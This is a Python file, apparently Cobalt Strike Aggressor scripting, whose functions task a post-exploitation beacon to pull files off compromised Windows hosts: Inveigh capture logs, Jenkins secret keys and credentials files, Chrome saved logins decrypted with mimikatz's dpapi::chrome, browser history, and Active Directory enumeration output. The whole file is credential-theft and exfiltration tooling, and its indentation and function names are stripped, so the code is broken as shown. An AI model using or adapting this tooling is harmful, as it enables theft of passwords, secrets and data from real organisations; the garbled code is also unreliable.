def _(bid):
#temp = r'{}\AppData\Local'.format(helpers.guess_home(bid))
temp = r'{}'.format(helpers.guess_home(bid))
out_file = r'{}\c'.format(temp)
dest = r'{}\temp.exe'.format(temp)
aggressor.brm(bid, dest)
aggressor.bdownload(bid, out_file)
def _(bid, home=None):
if not home:
home = helpers.guess_home(bid)
directory = r'{}\AppData\Roaming\Microsoft'.format(home)
aggressor.btask(
bid, 'Tasked beacon to grab inveigh files from {}'.format(directory))
for fname in ('clear', 'log', 'v1', 'v2', 'form'):
aggressor.bdownload(bid, r'{}\{}'.format(directory, fname))
def _(bid, host=None):
jenkins_dir = r'C:\program files (x86)\jenkins'
files = [
'secret.key', 'queue.xml', 'config.xml', 'jenkins.xml',
'github-plugin-configuration.xml', 'credentials.xml',
'scriptApproval.xml', 'scm-sync-configuration.xml',
'secrets/master.key', 'secrets/hudson.util.Secret'
]
if host:
prefix = helpers.path_to_unc(host, jenkins_dir)
aggressor.btask(
bid, 'Tasked beacon to download files in {}: {}'.format(
prefix, ', '.join(files)))
for fname in files:
path = r'{}\{}'.format(prefix, fname)
aggressor.bdownload(bid, path, silent=True)
def _(bid):
chrome_dir = r'%localappdata%\Google\Chrome\User Data\Default'
chrome_dir_guessed = chrome_dir.replace(
'%localappdata%', r'{}\AppData\Local'.format(helpers.guess_home(bid)))
login_data = r'{}\Login Data'.format(chrome_dir_guessed)
cookies = r'{}\Cookies'.format(chrome_dir_guessed)
history = r'{}\History'.format(chrome_dir_guessed)
bookmarks = r'{}\Bookmarks'.format(chrome_dir_guessed)
web_data = r'{}\Web Data'.format(chrome_dir_guessed)
login_data_copied = '{}.bak2'.format(login_data)
cookies_copied = '{}.bak2'.format(cookies)
# non-protected files (History/Bookmarks)
aggressor.bdownload(bid, history)
aggressor.bdownload(bid, bookmarks)
aggressor.bdownload(bid, web_data)
# protected files (Login Data/Cookies)
#aggressor.bshell(bid, 'copy "{}" "{}"'.format(login_data, login_data_copied))
aggressor.bcp(bid, login_data, login_data_copied)
#aggressor.bshell(bid, 'copy "{}" "{}"'.format(cookies, cookies_copied))
#aggressor.bmimikatz(bid, r'dpapi::chrome /in:"{}" /unprotect'.format(cookies_copied))
aggressor.bmimikatz(
bid, r'dpapi::chrome /in:"{}" /unprotect'.format(login_data_copied))
aggressor.brm(bid, login_data_copied)
def _(bid, *files):
for fname in files:
aggressor.bdownload(bid, fname)
def callback(path):
aggressor.bdownload(bid, path)
def callback(path):
ext = path.split('.')[-1]
if ext in extensions:
aggressor.bdownload(bid, path)
def _(bid, directory, *files):
for fname in files:
full = r'{}\{}'.format(directory, fname)
aggressor.bdownload(bid, full)
def _(bid, *args):
fname = ' '.join(args)
aggressor.bdownload(bid, fname)
def _(bid):
temp = helpers.guess_temp(bid)
aggressor.btask(
bid,
'Tasked beacon to download files from domain-enum (stage 2/3). Once finished run domain-enum-next2'
)
aggressor.bdownload(bid, r'{}\objects.domain'.format(temp))
aggressor.bdownload(bid, r'{}\policy.domain'.format(temp))
aggressor.bdownload(bid, r'{}\sites.domain'.format(temp))
aggressor.bdownload(bid, r'{}\subnets.domain'.format(temp))
aggressor.bdownload(bid, r'{}\gpo_localgroups.domain'.format(temp))
aggressor.bdownload(bid, r'{}\gpo_delegations.domain'.format(temp))
aggressor.bdownload(bid, r'{}\gpo_acls.domain'.format(temp))
aggressor.bdownload(bid, r'{}\trusts.domain'.format(temp))
aggressor.bdownload(bid, r'{}\managers.domain'.format(temp))
aggressor.bdownload(bid, r'{}\interesting_acls.domain'.format(temp))
